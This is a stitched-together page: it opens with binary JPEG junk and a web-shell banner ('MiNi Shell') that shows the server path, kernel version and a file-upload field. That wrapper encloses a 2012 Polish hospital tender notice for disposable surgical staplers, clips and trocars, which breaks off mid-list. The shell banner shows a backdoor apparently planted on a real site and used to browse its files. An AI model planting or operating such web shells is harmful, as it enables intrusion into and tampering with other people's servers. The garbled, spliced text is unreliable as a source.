JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120305/66726-N-2012.html

<p class="kh_header"><b>Szczecin: Dostawa sprzętu medycznego jednorazowego użytku do zabiegów chirurgicznych do magazynu medycznego SPWSZ w Szczecinie</b><br>
<b>Numer ogłoszenia: 66726 - 2012; data zamieszczenia: 05.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Wojewódzki Szpital Zespolony , ul. Arkońska 4, 71-455 Szczecin, woj. zachodniopomorskie, tel. 91 813 90 21, faks 91 813 9079.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spwsz.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu medycznego jednorazowego użytku do zabiegów chirurgicznych do magazynu medycznego SPWSZ w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu medycznego jednorazowego użytku do zabiegów chirurgicznych do magazynu medycznego SPWSZ w Szczecinie - w rozbiciu na 18 zadań.
Opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SIWZ, natomiast wymagane parametry techniczne przedmiotu  dostawy z zadań  nr 1 - 18 zostały opisane w załącznikach nr 1.1 - 1.18 do SIWZ, które po wypełnieniu należy dołączyć do oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 31.41.35.20-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Każdy z wykonawców ma obowiązek złożyć następujące dokumenty potwierdzające, że oferowane dostawy odpowiadają określonym wymaganiom:
1) dokumenty opisujące  przedmiot  zamówienia (katalog, strony katalogu lub foldery, ulotki informacyjne, prospekty) - w j. polskim do oferowanych wyrobów, ze wskazaniem w nim oferowanego asortymentu, podając nr zadania i pozycji w zadaniu.
2) wypełnione załączniki nr 1.1 - 1.18 do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy mają dołączyć do oferty następujące dokumenty:
1) ofertę cenową zgodnie z rozdziałem I pkt 3;
W przypadku składania oferty wspólnej należy złożyć jeden dokument;
2) odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spwsz.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Wojewódzki Szpital Zespolony, ul. Arkońska 4, 71-455 Szczecin - Sekcja Zamówień Publicznych pokój nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2012 godzina 10:30, miejsce: Kancelaria Samodzielnego Publicznego Wojewódzkiego Szpitala Zespolonego w Szczecinie, ul. Arkońska 4, pok. 12 w budynku Z.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Staplery okrężne prostei i zakrzywione.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler okrężny prosty jednorazowego użytku nr 25-26 - 19 sztuk
2. Stapler okrężny prosty jednorazowego użytku nr 28-29 - 29 sztuk
3. Stapler okrężny prosty jednorazowego użytku nr 31-33 - 10 sztuk
4. Stapler okrężny prosty jednorazowego użytku nr 21 - 3 sztuk
5. Stapler okrężny zakrzywiony jednorazowego użytku nr 25-26 - 16 sztuk
6. Stapler okrężny zakrzywiony jednorazowego użytku nr 28-29 - 20 sztuk
7. Stapler okrężny zakrzywiony jednorazowego użytku nr 31-33 - 10 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.1 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Staplery do żylaków odbytu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler do żylaków odbytu metodą LONGO rozmiar 33mm lub równoważny - 10 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.2 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Staplery liniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler liniowy dwurzędowy z nożem 55mm-60mm jednorazowego użytku - 80 sztuk
2. Magazynek do staplera liniowego z nożem 55mm-60mm - 30 sztuk
3. Stapler liniowy dwurzędowy z nożem 75mm-80mm jednorazowego użytku - 45 sztuk
4. Magazynek do staplera liniowego z nożem 75mm-80mm - 35 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.3 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Staplery liniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler liniowy dwurzędowy bez noża 55mm-60mm jednorazowego użytku - 40 sztuk
2. Magazynek do staplera liniowego bez noża 55mm-60mm - 10 sztuk
3. Stapler liniowy dwurzędowy bez noża 80mm-90mm jednorazowego użytku - 40 sztuk
4. Magazynek do staplera liniowego bez noża 80mm-90mm - 20 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.4 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Staplery skórne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler skórny na 35 zszywek - 200 sztuk
2. Narzędzia do ściągania klipsów skórnych jednorazowego użytku - 50 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.5 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Staplery i trokary naczyniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler naczyniowy 45mm jednorazowego użytku do chirurgii transplantacji wątroby trzyrzędowy z nożem - 45 sztuk
2. Jednorazowy trokar ostrzowy o średnicy 12,9 mm, dł. 100 mm, kompatybilny z w/w staplerem. - 5 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.6 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Staplery laparoskopowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler laparoskopowy trzyrzędowy z nożem jednorazowym - 10 sztuk
2. Magazynek do staplera laparoskopowego trzyrzędowego jednorazowego do tkanki cienkiej, normalnej, grubej - 20 sztuk
3. Trokar bezpieczny do staplera laparoskopowego trzyrzędowego jednorazowego - 10 sztuki
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.7 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Klipsownice automatyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Klipsownica automatyczna 23-25cm jednorazowego użytku z magazynkiem klipsów małych (minimum 20 sztuk) do chirurgii otwartej - 120 sztuk
2. Klipsownica automatyczna 23-25cm jednorazowego użytku z magazynkiem klipsów średnich (minimum 20 sztuk) do chirurgii otwartej - 120 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.8 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Klipsy polimerowe wraz z dzierżawą klipsownic 
Klipsy tytanowe wraz z dzierżawą klipsownic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Klipsy polimerowe średnie - 180 sztuk
2. Klipsy polimerowe średnio-duże - 120 sztuk
3. Klipsy polimerowe bardzo duże - 120 sztuk
4. Dzierżawa klipsownicy laparoskopowej wielorazowego użytku do klipsów średnich - 1 sztuka
5. Dzierżawa klipsownicy laparoskopowej wielorazowego użytku do klipsów średnio-duzych - 1 sztuka
6. Dzierżawa klipsownicy laparoskopowej wielorazowego użytku do klipsów bardzo dużych - 1 sztuka
7. Klipsy tytanowe małe - 5 400 sztuk
8. Klipsy tytanowe średnie - 5 400 sztuk
9. Klipsy tytanowe średnio-duże - 3 000 sztuk
10. Klipsy tytanowe duże - 1 200 sztuk
11. Dzierżawa klipsownicy wielorazowego użytku do chirurgii otwartej 20-23cm do klipsów małych - 8 sztuk
12. Dzierżawa klipsownicy wielorazowego użytku do chirurgii otwartej 20-23cm do klipsów średnich - 8 sztuk
13. Dzierżawa klipsownicy wielorazowego użytku do chirurgii otwartej 20-23cm do klipsów średnio-dużych - 8 sztuk
14. Dzierżawa klipsownicy wielorazowego użytku do chirurgii otwartej 20-23cm do klipsów dużych - 8 sztuk
15. Dzierżawa klipsownicy laparoskopowej wielorazowego użytku do klipsów średnio-dużych - 6 sztuk
16. Dzierżawa klipsownicy laparoskopowej wielorazowego użytku do klipsów dużych - 3 sztuki
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.9 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Klipsy do klipsownicy laparoskopowej wraz z dzierżawą klipsownic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Magazynki klipsów średnio-małych do klipsownicy laparoskopowej automatycznej wielorazowego użytku,, 1 magazynek = 12 klipsów. - 36 magazynków
2. Magazynki klipsów średnio-dużych do klipsownicy laparoskopowej automatycznej wielorazowego użytku, 1 magazynek = 8 klipsów. - 48 magazynków
3. Dzierżawa klipsownicy laparoskopowej automatycznej wielorazowego użytku o długości od 310mm do 350mm do klipsów średnio-małych - 3 sztuki
4. Dzierżawa klipsownicy laparoskopowej automatycznej wielorazowego użytku o długości od 310mm do 370mm do klipsów średnio-dużych - 3 sztuki
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.10 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Trokary.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Trokar bezpieczny typu STEEP 5mm jednorazowego użytku lub równoważny - 30 sztuk
2. Trokar bezpieczny typu STEEP 12mm jednorazowego użytku lub równoważny - 450 sztuk
3. Igła Veresa 140-170mm jednorazowego użytku jałowa - 450 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.11 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Końcówki do noża harmonicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Końcówka do noża harmonicznego GENERATOR 300 ETHICON ENDO - SURGERY typu GEN 04 długość 14-15cm - 20 sztuk
2. Końcówka do noża harmonicznego GENERATOR 300 ETHICON ENDO - SURGERY typu GEN 04 długość 9cm lub 17  cm. - 1 sztuka
3. Końcówka do noża harmonicznego GENERATOR 300 ETHICON ENDO - SURGERY typu GEN 04 długość 36cm - 20 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.12 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Staplery okrężne zakrzywione.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler okrężny zakrzywiony jednorazowego użytku 21mm i 25mm (do wyboru przez Zamawiającego) - 5 sztuk
2. Trans oralny system wprowadzania główki do okrężnego staplera laparoskopowego (wersja przedłużona) 21mm i 25mm (do wyboru przez Zamawiającego) - 5 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.13 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Gumki do podciągania naczyń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Gumka do podciągania naczyń 1,2 x 65-75cm czerwona, niebieska, żółta, biała (do wyboru przez Zamawiającego) - 1 700 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.14 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Staplery laparoskopowe proste.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler laparoskopowy prosty jednorazowego użytku 35mm - 2 sztuk
Wymagane parametry techniczne przedmiotu zamówienia zostały opisane w załączniku nr 1.15 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Worki laparoskopowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Worek laparoskopowy jednorazowego użytku 15mm do pobierania próbek - 3 sztuk
